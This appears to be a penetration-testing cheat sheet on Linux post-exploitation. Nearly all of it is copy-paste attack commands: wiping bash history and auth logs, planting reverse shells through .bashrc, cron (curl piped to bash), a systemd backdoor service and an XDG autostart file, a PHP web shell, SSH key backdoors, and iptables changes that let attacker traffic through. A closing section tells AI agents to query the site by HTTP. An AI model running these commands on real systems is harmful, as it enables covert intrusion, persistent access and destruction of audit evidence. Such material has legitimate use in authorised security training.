# Post Exploitation

## Cover Your Tracks & Remain Undetected

{% embed url="<https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover-your-tracks-remain-undetected-0244768/>" %}

### Clear History

```sh
unset HISTORY
echo '' > ~/.bash_history
echo '' > /root/.bash_history
history -c
export HISTSIZE=0
unset HISTFILE
```

### Clear Logs

```sh
# Shrink the size of log files with `truncate -s 0`
truncate -s 0 /var/log/auth.log
echo '' > /var/log/auth.log
cat /dev/null > /var/log/auth.log
> /var/log/auth.log
dd if=/dev/null of=/var/log/auth.log
shred /var/log/auth.log
```

## Persistence

### .bashrc

Add this line to **`/root/.bashrc`** or **`/home/<user>/.bashrc`** to gain access to target machine by reverse shell when the victim user logged in.

```sh
bash -i >& /dev/tcp/10.0.0.1/4444
```

### Cron

Add the following line to the cron file like **`/etc/crontab`** in the target machine.\
Replace `10.0.0.1` with your ip address.

```shell
* * * * * root curl http://10.0.0.1/shell | bash
```

Host a shell and start you listener

```sh
#!/bin/bash
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
```

Now start local web server and listener in each terminal in local machine.

```shell
sudo python3 -m http.server 80
nc -lvnp 4444
```

## PHP

#### 1. Create a Payload

Create a php file (e.g. shell.php) into **`/var/www/html`**.

```php
<?php 

	if (isset($_REQUEST['cmd'])) {
		echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
	}

?>
```

Navigate to the file

```sh
http://<target-ip>/shell.php?cmd=bach -i >& /dev/tcp/<local-ip>/4444 0>&1
```

## SSH

We can establish a backdoor to allow us to be able to connect the target SSH server anytime by leaving our public key in the target machine.

#### 1. Generate a New SSH key

First off, run the following command to generate SSH key.

```shell
ssh-keygen
```

It will generate two keys, **private key (id\_rsa)** and **public key (id\_rsa.pub)**.

#### 2. On the target host add you public IP

```
echo "<content-id_rsa.pub>"  >> authorized_keys
```

## Systemd

We can use systemd as a backdoor because an arbitrary command will be executed when a service start.\
The command is stored in **`[Services]`** section in the configuration file.

#### 1. Create a New Systemd Config File

Create **`/etc/systemd/system/backdoor.service`** in target machine.\
This service will execute **reverse shell** when starting.

```bash
[UNIT]
Description=Backdoor

[Service]
Type=simple
ExecStart=/bin/bash -i >& /dev/tcp/<local-ip>/4444 0>&1

[Install]
WantedBy=multi-user.target
```

Then enable the service.

```
systemctl enable backdoor
```

Now this service will start when the target system boots.

#### 2. Wait for Reverse Connecting

We need to leave the netcat listener running in local machine.

```sh
nc -lvnp 4444
```

Then we'll get a shell anytime the service starts.

<br>

### XDG Autostart

Reference: [TryHackMe](https://tryhackme.com/r/room/linuxprocessanalysis)

**Autostart** is also used for persistence. First create a `$HOME/.config/autostart` directory if it does not exist and create a new file with arbitrary name as below:

```
mkdir -p /home/<user>/.config/autostart
touch /home/<user>/.config/autostart/evil.desktop
```

Then write a malicious code in this file:

```
# /home/<users>/.config/autostart/evil.desktop

[Desktop Entry]
Type=Application
Name=Test
Exec=/bin/bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
```

After that, the command at the `Exec` field will be executed when the target user logs in.\
We need to keep opening a listener in attack machine for receiving incoming connection:

```powershell
nc -lvnp 4444
```

<br>

### Option: Firewall Bypass

If the target system applies firewall for preventing communications with external systems, we may bypass the settings by manipulating them. It requires root privilege.

```sh
# List the iptables settings
iptables --list

# ACCEPT: TARGET => ATTACKER
# OUTPUT 1: The first rule of the OUTPUT chain.
# -d: Destination address
iptables -I OUTPUT 1 -p tcp -d <attacker-ip> -j ACCEPT

# ACCEPT: TARGET <= ATTACKER
# INPUT 1: The first rule of the INPUT chain.
# -s: Source address
iptables -I INPUT 1 -p tcp -s <attacker-ip> -j ACCEPT
```

<br>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://intrusionz3r0.gitbook.io/intrusionz3r0/linux-penetration-testing/post-exploitation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.